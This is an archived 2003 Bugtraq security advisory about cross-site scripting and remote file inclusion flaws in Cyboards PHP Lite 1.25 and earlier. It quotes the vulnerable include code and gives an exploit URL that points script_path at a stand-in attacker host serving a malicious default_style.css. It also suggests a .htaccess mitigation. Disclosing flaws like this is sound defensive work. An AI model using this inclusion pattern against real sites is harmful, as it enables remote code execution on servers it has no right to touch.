Cyboards Remote Code Execution

From: mindwarper@hush.com
Date: 01/13/03

  • Next message: Manuel Bouyer: "Re: More information regarding Etherleak" 
    Date: Mon, 13 Jan 2003 13:27:33 -0800
To: bugtraq@securityfocus.com
From: mindwarper@hush.com

    Cyboards PHP Lite Vulnerability ( By Mindwarper :: mindwarper@hush.com :: )

    <------- ------->

    ----------------------
    Vendor Information:
    ----------------------

    Homepage : http://www.gold-sonata.com
    Vendor : informed
    Mailed advisory: 13/01/03
    Vender Response : None yet (possibly because they have no contact page and the report
    was sent to abuse@gold-sonata.com)

    ----------------------
    Affected Versions:
    ----------------------

    1.25 and prior
    (tested on 1.25 and 1.21)

    ----------------------
    Description:
    ----------------------

    Cyboards PHP Lite is a free open-source bulletin board programmed in php. A couple of
    vulnerabilites exist in the /include directory which may result in allowing the attacker
    to execute remote code on the server with webserver permission. Another vulnerability
    which can be found in /include directory may allow attacker to hijack other members
    accounts through XSS.

    ----------------------
    Exploit:
    ----------------------

    XSS:

    Possible in the following files and possibly more:

    include/default_header.php
    include/options_form.php
    adminopts/login_form.php
    adminopts/include/ban_form.php
    adminopts/include/board_form.php
    adminopts/include/login_form.php
    adminopts/include/vip_form.php

    Remote Arbitrary Code Execution:

    In a couple of files inside the include directory the php files do not check safely for
    inclusion and allow remote users to call them directly. The result of this problem would
    allow remote attacker to include their own remote arbitrary code and run it on the server.

    1. include/default_header.php

    -- This file looks something like this --
    ****************
    ..

    if(isset($board_config["style***"])&&(trim($board_config["style***"])!="")) {
      echo "<LINK REL=STYLE*** HREF='".$board_config["style***"]."' TYPE='text/css'>\n\n";
    } else {
      echo "<style>\n";
      include("$script_path/include/default_style.css");
      echo "\n</style>";
    }

    ..

    ****************

    By default, $board_config["style***"] is not set since it has not been included inside
    another forum file. This means that include("$script_path/include/default_style.css");
    will be executed. By creating a directory called include on the attacker's server and
    placing the desired code inside default_style.css, and attacker can trick the inclusion
    and make it include the wrong css file. By doing so, php will execute the attackers code.
    The URI looks something like this:

    http://victim/forum/include/default_header.php?script_path=http://attacker

    where the attacker has created a directory called /include and inside a file called
    default_style.css which contains the malicious code.

    2. include/options_form.php

    Contains the following code on the first line:

    ---=---
    <? include("$script_path/lang/$lang_code/".$lang_code."_options.php"); ?>
    ---=---
    *

    Note: An attacker can use this for a XSS attack as well, but given the possibilty of
    running remote code on the server it is more probable he/she will use it for remote code
    execution.

    ----------------------
    Solution:
    ----------------------

    Please check the vendor's website for new patches.

    As a temporary solution, create a .htaccess file that contains 'Deny from all'.
    Place it in the /include directory and that should block remote users from accessing it.

    ----------------------
    Greetz:
    ----------------------

    Cyon, daemorhedron, Truckle, Methodus, MC187, DJX.

    <------- ------->

    Concerned about your privacy? Follow this link to get
    FREE encrypted email: https://www.hushmail.com/?l=2

    Big $$$ to be made with the HushMail Affiliate Program:
    https://www.hushmail.com/about.php?subloc=affiliate&l=427sp;200301132127.h0DLRY9D080371@mailserver2.hushmail.com